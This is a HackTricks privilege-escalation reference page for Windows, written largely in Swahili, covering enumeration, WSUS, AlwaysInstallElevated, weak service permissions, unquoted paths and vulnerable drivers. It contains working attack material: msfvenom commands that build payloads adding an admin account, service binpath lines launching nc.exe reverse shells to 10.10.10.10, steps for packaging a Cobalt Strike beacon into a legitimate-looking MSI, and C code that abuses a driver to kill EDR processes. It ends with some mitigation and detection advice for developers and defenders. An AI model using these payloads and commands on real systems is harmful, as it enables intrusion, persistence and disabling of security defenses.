Windows Local Privilege Escalation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Chombo bora cha kutafuta Windows local privilege escalation vectors: WinPEAS

Nadharia za Awali za Windows

Access Tokens

Ikiwa hujui ni Windows Access Tokens ni nini, soma ukurasa ufuatao kabla ya kuendelea:

Access Tokens

ACLs - DACLs/SACLs/ACEs

Angalia ukurasa ufuatao kwa taarifa zaidi kuhusu ACLs - DACLs/SACLs/ACEs:

ACLs - DACLs/SACLs/ACEs

Integrity Levels

Ikiwa hujui integrity levels katika Windows ni nini, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:

Integrity Levels

Udhibiti wa Usalama wa Windows

Kuna mambo mbalimbali ndani ya Windows ambayo yanaweza kukuzuia kuorodhesha mfumo (enumerating the system), kuendesha executables au hata kugundua shughuli zako (detect your activities). Unapaswa kusoma ukurasa ufuatao na kuorodhesha (enumerate) mifumo yote ya ulinzi (defenses mechanisms) hizi kabla ya kuanza privilege escalation enumeration:

Windows Security Controls

Taarifa za Mfumo

Version info enumeration

Angalia ikiwa toleo la Windows lina udhaifu wowote unaojulikana (pia angalia patches zilizotumika).

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture

[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Version Exploits

Tovuti hii site ni muhimu kwa kutafuta taarifa za kina kuhusu Microsoft security vulnerabilities. Hifadhidata hii ina zaidi ya 4,700 security vulnerabilities, ikionyesha massive attack surface ambayo mazingira ya Windows yanayo.

On the system

post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester
watson
winpeas (Winpeas ina watson imejengwa ndani)

Locally with system information

Github repos za exploits:

Mazingira

Je, kuna credential/Juicy info iliyohifadhiwa katika env variables?

set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize

Historia ya PowerShell

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

PowerShell Faili za Transcript

Unaweza kujifunza jinsi ya kuwasha hii katika https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/

#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript

PowerShell Module Logging

Maelezo ya utekelezaji wa pipeline ya PowerShell yanarekodiwa, yakijumuisha amri zilizotekelezwa, miito ya amri, na sehemu za scripts. Hata hivyo, maelezo kamili ya utekelezaji na matokeo yake huenda hayarekodiwi.

Ili kuwezesha hili, fuata maelekezo katika sehemu ya “Transcript files” ya nyaraka, ukichagua “Module Logging” badala ya “Powershell Transcription”.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging

Ili kuona matukio 15 ya mwisho kutoka kwenye logi za PowersShell unaweza kutekeleza:

Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView

PowerShell Script Block Logging

Rekodi kamili ya shughuli na yaliyomo yote ya utekelezaji wa script inarekodiwa, ikihakikisha kila block ya code imedokumentiwa inapoendeshwa. Mchakato huu unahifadhi rejista kamili ya ukaguzi ya kila shughuli, ambayo ni ya thamani kwa forensics na kwa kuchambua tabia haribifu. Kwa kudokumentisha shughuli zote wakati wa utekelezaji, hutoa ufahamu wa kina kuhusu mchakato.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Matukio ya Script Block yanaweza kupatikana ndani ya Windows Event Viewer kwenye njia: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
Ili kuona matukio 20 ya mwisho unaweza kutumia:

Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview

Mipangilio ya Intaneti

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

Diski

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

WSUS

Unaweza kupata udhibiti wa mfumo ikiwa sasisho hazitaalaviwa kwa kutumia httpS bali http.

Unaanza kwa kukagua ikiwa mtandao unatumia non-SSL WSUS update kwa kuendesha yafuatayo katika cmd:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

Au yafuatayo katika PowerShell:

Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"

Ikiwa unapata jibu kama mojawapo ya haya:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535

WUServer     : http://xxxx-updxx.corp.internal.com:8530
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName  : windowsupdate
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry

Na ikiwa HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer au Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" ni sawa na 1.

Then, it is exploitable. Ikiwa rejista ya mwisho ni sawa na 0, basi kipengele cha WSUS kitapuuziwa.

Ili kutekeleza udhaifu huu unaweza kutumia zana kama: Wsuxploit, pyWSUS - These are MiTM weaponized exploits scripts to inject ‘fake’ updates into non-SSL WSUS traffic.

Read the research here:

WSUS CVE-2020-1013

Read the complete report here.
Kimsingi, hii ndio dosari ambayo hitilafu hii inalitumia:

If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.

Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.

Unaweza kutekeleza udhaifu huu kwa kutumia zana WSUSpicious (mara itakapotolewa).

Third-Party Auto-Updaters and Agent IPC (local privesc)

Wakala wengi wa shirika hutoa uso wa localhost IPC na chaneli ya masasisho yenye ruhusa. Ikiwa usajili unaweza kulazimishwa kwenda kwenye seva ya mshambuliaji na updater inamwamini rogue root CA au ukaguzi dhaifu wa signer, mtumiaji wa ndani anaweza kusambaza MSI yenye madhara ambayo huduma ya SYSTEM itaweka. Tazama mbinu ya jumla (inayotegemea mnyororo wa Netskope stAgentSvc – CVE-2025-0309) hapa:

Abusing Auto Updaters And Ipc

KrbRelayUp

A local privilege escalation vulnerability exists in Windows domain environments under specific conditions. These conditions include environments where LDAP signing is not enforced, users possess self-rights allowing them to configure Resource-Based Constrained Delegation (RBCD), and the capability for users to create computers within the domain. It is important to note that these requirements are met using default settings.

Find the exploit in https://github.com/Dec0ne/KrbRelayUp

For more information about the flow of the attack check https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/

AlwaysInstallElevated

If hizi rejista 2 ziko enabled (value is 0x1), basi watumiaji wa ruhusa yoyote wanaweza install (execute) *.msi files as NT AUTHORITY\SYSTEM.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Metasploit payloads

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

Ikiwa una kikao cha meterpreter unaweza kuendesha kwa automatisimu mbinu hii ukitumia moduli exploit/windows/local/always_install_elevated

PowerUP

Tumia amri Write-UserAddMSI kutoka power-up kuunda ndani ya saraka ya sasa faili la MSI la Windows ili kupandisha ruhusa. Script hii inaandika installer ya MSI iliyotengenezwa mapema ambayo itauliza kuongeza mtumiaji/kikundi (hivyo utahitaji upatikanaji wa GIU):

Write-UserAddMSI

Tekeleza tu binary iliyotengenezwa ili kupandisha ruhusa.

MSI Wrapper

Soma mafunzo haya ili kujifunza jinsi ya kuunda MSI wrapper ukitumia zana hizi. Kumbuka kwamba unaweza ku-wrap faili .bat ikiwa unataka tu execute command lines

MSI Wrapper

Create MSI with WIX

Create MSI with Visual Studio

Generate na Cobalt Strike au Metasploit payload mpya ya Windows EXE TCP katika C:\privesc\beacon.exe
Fungua Visual Studio, chagua Create a new project na andika “installer” kwenye kisanduku cha utafutaji. Chagua mradi wa Setup Wizard na bonyeza Next.
Mpa mradi jina, kama AlwaysPrivesc, tumia C:\privesc kwa eneo, chagua place solution and project in the same directory, na bonyeza Create.
Endelea kubofya Next hadi ufikie hatua 3 ya 4 (chagua mafaili ya kujumuisha). Bonyeza Add na chagua payload ya Beacon uliyoitengeneza. Kisha bonyeza Finish.
Chagua mradi AlwaysPrivesc katika Solution Explorer na kwenye Properties, badilisha TargetPlatform kutoka x86 hadi x64.
Kuna mali nyingine unaweza kubadilisha, kama Author na Manufacturer ambazo zinaweza kufanya programu iliyosakinishwa ionekane halali zaidi.
Bofya kulia mradi na chagua View > Custom Actions.
Bofya kulia Install na chagua Add Custom Action.
Bonyeza mara mbili Application Folder, chagua faili yako beacon.exe na bonyeza OK. Hii itahakikisha kwamba payload ya beacon inatekelezwa mara tu installer inapofanywa.
Chini ya Custom Action Properties, badilisha Run64Bit kuwa True.
Mwisho, build it.
Ikiwa onyo File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' linaonyeshwa, hakikisha umeweka platform kuwa x64.

MSI Installation

Ili kutekeleza installation ya faili hatari .msi kwa background:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

Ili exploit udhaifu huu unaweza kutumia: exploit/windows/local/always_install_elevated

Antivirus na Vichunguzi

Mipangilio ya Ukaguzi

Mipangilio hii inaamua ni nini kinachorekodiwa (logged), kwa hivyo unapaswa kuzingatia

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit

WEF

Windows Event Forwarding, inavutia kujua wapi logs zimetumwa

reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager

LAPS

LAPS imetengenezwa kwa ajili ya usimamizi wa nywila za Administrator wa ndani, ikihakikisha kuwa kila nywila ni ya kipekee, iliyopangwa kwa nasibu, na inayosasishwa mara kwa mara kwenye kompyuta zilizojiunga na domain. Nywila hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kupatikana tu na watumiaji waliopewa ruhusa za kutosha kupitia ACLs, kuwawezesha kuona nywila za admin wa ndani ikiwa wanaruhusiwa.

LAPS

WDigest

Ikiwa imewezeshwa, plain-text passwords zinahifadhiwa katika LSASS (Local Security Authority Subsystem Service).
Maelezo zaidi kuhusu WDigest kwenye ukurasa huu.

reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential

LSA Protection

Kuanzia na Windows 8.1, Microsoft ilianzisha ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili kuzuia jaribio la michakato isiyotegemewa kusoma kumbukumbu yake au kuingiza code, hivyo kuongeza usalama wa mfumo.
More info about LSA Protection here.

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL

Credentials Guard

Credential Guard ilianzishwa katika Windows 10. Kusudi lake ni kulinda nyaraka za uthibitisho zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama mashambulizi ya pass-the-hash.| More info about Credentials Guard here.

reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags

Cached Credentials

Domain credentials huthibitishwa na Local Security Authority (LSA) na zinatumika na vipengele vya mfumo wa uendeshaji. Wakati data ya kuingia ya mtumiaji inathibitishwa na registered security package, domain credentials za mtumiaji kawaida huanzishwa.
More info about Cached Credentials here.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT

Watumiaji na Makundi

Orodhesha Watumiaji na Makundi

Unapaswa kuangalia kama kuna kundi lolote unalohusishwa nalo lenye ruhusa zinazovutia

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Makundi yenye ruhusa

Ikiwa uko katika kundi lenye ruhusa maalum, unaweza kuweza escalate privileges. Jifunze kuhusu makundi yenye ruhusa na jinsi ya kuyatumia vibaya ili escalate privileges hapa:

Privileged Groups

Token manipulation

Jifunze zaidi kuhusu ni nini ni token kwenye ukurasa huu: Windows Tokens.
Tazama ukurasa ufuatao ili ujifunze kuhusu tokens zinazovutia na jinsi ya kuvitumia vibaya:

Abusing Tokens

Watumiaji walioingia / Vikao

qwinsta
klist sessions

Folda za nyumbani

dir C:\Users
Get-ChildItem C:\Users

Sera ya nenosiri

net accounts

Pata yaliyomo kwenye clipboard

powershell -command "Get-Clipboard"

Michakato Inayoendeshwa

Ruhusa za Faili na Folda

Kwanza kabisa, unapoorodhesha michakato angalia nywila ndani ya command line ya process.
Angalia kama unaweza overwrite some binary running au kama una ruhusa za kuandika kwenye folda ya binary ili kutumia DLL Hijacking attacks:

Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes

#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Daima angalia uwezekano wa electron/cef/chromium debuggers zinazoendesha, unaweza kuitumia vibaya to escalate privileges.

Kuangalia ruhusa za binaries za michakato

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)

Kukagua ruhusa za folda za binaries za michakato (DLL Hijacking)

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)

Memory Password mining

Unaweza kuunda memory dump ya mchakato unaokimbia ukitumia procdump kutoka sysinternals. Huduma kama FTP zina credentials in clear text in memory, jaribu kufanya dump ya memory na kusoma credentials.

procdump.exe -accepteula -ma <proc_name_tasklist>

Programu za GUI zisizo salama

Programu zinazoendesha kama SYSTEM zinaweza kumuwezesha mtumiaji kuzindua CMD, au kuvinjari saraka.

Mfano: “Windows Help and Support” (Windows + F1), tafuta “command prompt”, bofya “Click to open Command Prompt”

Huduma

Service Triggers huruhusu Windows kuanzisha service wakati hali fulani zinapotokea (named pipe/RPC endpoint activity, ETW events, IP availability, device arrival, GPO refresh, n.k.). Hata bila haki za SERVICE_START mara nyingi unaweza kuanzisha services zenye hadhi kwa kuwasha triggers zao. Angalia mbinu za uorodheshaji na uanzishaji hapa:

Service Triggers

Pata orodha ya services:

net start
wmic service list brief
sc query
Get-Service

Ruhusa

Unaweza kutumia sc kupata taarifa za huduma

sc qc <service_name>

Inashauriwa kuwa na binary accesschk kutoka Sysinternals ili kuangalia kiwango kinachohitajika cha ruhusa kwa kila huduma.

accesschk.exe -ucqv <Service_Name> #Check rights for different groups

Inashauriwa kuangalia ikiwa “Authenticated Users” wanaweza kubadilisha huduma yoyote:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version

You can download accesschk.exe for XP for here

Washa huduma

Ikiwa unapata kosa hili (kwa mfano na SSDPSRV):

System error 1058 has occurred.
Huduma haiwezi kuanzishwa, ama kwa sababu imezimwa au kwa sababu haina vifaa vilivyowezeshwa vinavyohusishwa nayo.

Unaweza kuiwezesha ukitumia

sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""

Zingatia kwamba huduma upnphost inategemea SSDPSRV ili ifanye kazi (kwa XP SP1)

Njia mbadala nyingine ya tatizo hili ni kuendesha:

sc.exe config usosvc start= auto

Modify service binary path

Katika hali ambapo kundi la “Authenticated users” lina SERVICE_ALL_ACCESS kwenye service, inawezekana kubadilisha executable binary ya service. Ili kubadilisha na kuendesha sc:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

Anzisha upya huduma

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

Kupandishwa kwa ruhusa kunaweza kufanyika kupitia ruhusa mbalimbali:

SERVICE_CHANGE_CONFIG: Inaruhusu kurekebisha binary ya service.
WRITE_DAC: Inawezesha kurekebisha ruhusa, na kusababisha uwezo wa kubadilisha usanidi wa service.
WRITE_OWNER: Inaruhusu kupata umiliki na kurekebisha ruhusa.
GENERIC_WRITE: Inarithi uwezo wa kubadilisha usanidi wa service.
GENERIC_ALL: Pia inarithi uwezo wa kubadilisha usanidi wa service.

Kwa ajili ya utambuzi na kuchukua faida ya udhaifu huu, exploit/windows/local/service_permissions inaweza kutumika.

Ruhusa dhaifu za binaries za service

Angalia kama unaweza kubadilisha binary ambayo inatekelezwa na service au kama una ruhsia za kuandika kwenye folda ambapo binary ipo (DLL Hijacking).
Unaweza kupata binary zote zinazotekelezwa na service kwa kutumia wmic (si katika system32) na kuangalia ruhusa zako kwa kutumia icacls:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt

for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

Unaweza pia kutumia sc na icacls:

sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt

Services registry modify permissions

Unapaswa kuangalia kama unaweza kubadilisha service registry yoyote.
Unaweza kuangalia permissions zako kwenye service registry kwa kufanya:

reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

Inapaswa kukaguliwa kama Authenticated Users au NT AUTHORITY\INTERACTIVE wana ruhusa za FullControl. Ikiwa ndivyo, binary inayotekelezwa na huduma inaweza kubadilishwa.

Ili kubadilisha Path ya binary inayotekelezwa:

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

Rejista ya Services AppendData/AddSubdirectory permissions

Ikiwa una ruhusa hii juu ya rejista, hii inamaanisha kwamba unaweza kuunda rejista ndogo kutoka kwa hii. Katika kesi ya Windows services hii ni ya kutosha kutekeleza arbitrary code:

AppendData/AddSubdirectory permission over service registry

Njia za Service zisizo na Nukuu

Ikiwa njia kwa executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila sehemu kabla ya nafasi.

Kwa mfano, kwa njia C:\Program Files\Some Folder\Service.exe Windows itajaribu kutekeleza:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

Orodhesha njia zote za huduma zisizo na nukuu, isipokuwa zile za huduma zilizojengwa za Windows:

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"'  # Not only auto services

# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose

for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Unaweza kugundua na kutumia udhaifu huu kwa metasploit: exploit/windows/local/trusted\_service\_path
Unaweza kuunda binari ya service kwa mkono kwa kutumia metasploit:

msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe

Hatua za Urejesho

Windows inaruhusu watumiaji kubainisha hatua zitakazochukuliwa iwapo huduma itashindwa. Kipengele hiki kinaweza kusanidiwa kuelekeza kwa binary. Iwapo binary hii inaweza kubadilishwa, privilege escalation inaweza kuwa inawezekana. Maelezo zaidi yanapatikana katika the official documentation.

Programu

Programu Zilizowekwa

Angalia permissions of the binaries (labda unaweza kuibadilisha moja na escalate privileges) na za folders (DLL Hijacking).

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Write Permissions

Angalia kama unaweza kubadilisha baadhi ya config file ili kusoma faili maalum, au kama unaweza kubadilisha binary ambayo itatekelezwa na Administrator account (schedtasks).

Njia ya kutafuta folder/files permissions dhaifu kwenye mfumo ni kufanya:

accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*

icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

Endesha wakati wa kuanzisha

Angalia ikiwa unaweza overwrite baadhi ya registry au binary ambayo itatekelezwa na mtumiaji mwingine.
Soma ukurasa ufuatao ili ujifunze zaidi kuhusu autoruns locations to escalate privileges:

Privilege Escalation with Autoruns

Madereva

Tafuta madereva ya pande za tatu ambayo ni ajabu/yanayoweza kuwa na udhaifu

driverquery
driverquery.exe /fo table
driverquery /SI

Ikiwa driver inatoa arbitrary kernel read/write primitive (common in poorly designed IOCTL handlers), unaweza kupandisha hadhi kwa kuiba token ya SYSTEM moja kwa moja kutoka kwenye kumbukumbu ya kernel. Angalia mbinu hatua‑kwa‑hatua hapa:

Arbitrary Kernel Rw Token Theft

Kwa bugs za race-condition ambapo simu dhaifu inafungua attacker-controlled Object Manager path, kupunguza kwa makusudi kasi ya lookup (using max-length components or deep directory chains) kunaweza kupanua dirisha kutoka microseconds hadi kumi au kadhaa za microseconds:

Kernel Race Condition Object Manager Slowdown

Primitives za uharibifu wa kumbukumbu za Registry hive

Modern hive vulnerabilities zinakuwezesha kupanga deterministic layouts, kutumia writable HKLM/HKU descendants, na kubadilisha metadata corruption kuwa kernel paged-pool overflows bila custom driver. Jifunze mnyororo mzima hapa:

Windows Registry Hive Exploitation

Kutumia ukosefu wa FILE_DEVICE_SECURE_OPEN kwenye device objects (LPE + EDR kill)

Baadhi ya signed third‑party drivers huunda device object yao kwa SDDL kali kupitia IoCreateDeviceSecure lakini husahau kuweka FILE_DEVICE_SECURE_OPEN katika DeviceCharacteristics. Bila bendera hii, secure DACL haitekelezwiki wakati device inafunguliwa kupitia path yenye sehemu ya ziada, ikimruhusu mtumiaji asiye na ruhusa kupata handle kwa kutumia namespace path kama:

\ .\DeviceName\anything
\ .\amsdk\anyfile (kutoka kwa kesi ya ulimwengu halisi)

Baada mtumiaji anapoweza kufungua device, privileged IOCTLs exposed by the driver zinaweza kutumiwa kwa LPE na kuharibu. Uwezo wa mfano uliobainika katika mazingira ya kweli:

Kurudisha handles zenye full-access kwa arbitrary processes (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
Soma/andika raw disk bila vizuizi (offline tampering, boot-time persistence tricks).
Kumaliza arbitrary processes, ikiwa pamoja na Protected Process/Light (PP/PPL), kurejesha AV/EDR kill kutoka user land kupitia kernel.

Minimal PoC pattern (user mode):

// Example based on a vulnerable antimalware driver
#define IOCTL_REGISTER_PROCESS  0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048

HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS,  &me,     sizeof(me),     0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);

Kupunguza hatari kwa waendelezaji

Daima weka FILE_DEVICE_SECURE_OPEN unapounda device objects zinazokusudiwa kufungwa na DACL.
Thibitisha muktadha wa caller kwa operesheni zenye ruhusa. Ongeza ukaguzi wa PP/PPL kabla ya kuruhusu kumalizika kwa mchakato au kurudishwa kwa handle.
Zuia IOCTLs (access masks, METHOD_*, ukaguzi wa input) na fikiria brokered models badala ya ruhusa za moja kwa moja za kernel.

Mawazo ya utambuzi kwa watetezi

Fuatilia ufunguzi wa user-mode wa majina ya device yenye shaka (e.g., \ .\amsdk*) na mfululizo maalum wa IOCTL unaoashiria matumizi mabaya.
Tekeleza Microsoft’s vulnerable driver blocklist (HVCI/WDAC/Smart App Control) na udumishe orodha zako za ruhusu/kukataa.

PATH DLL Hijacking

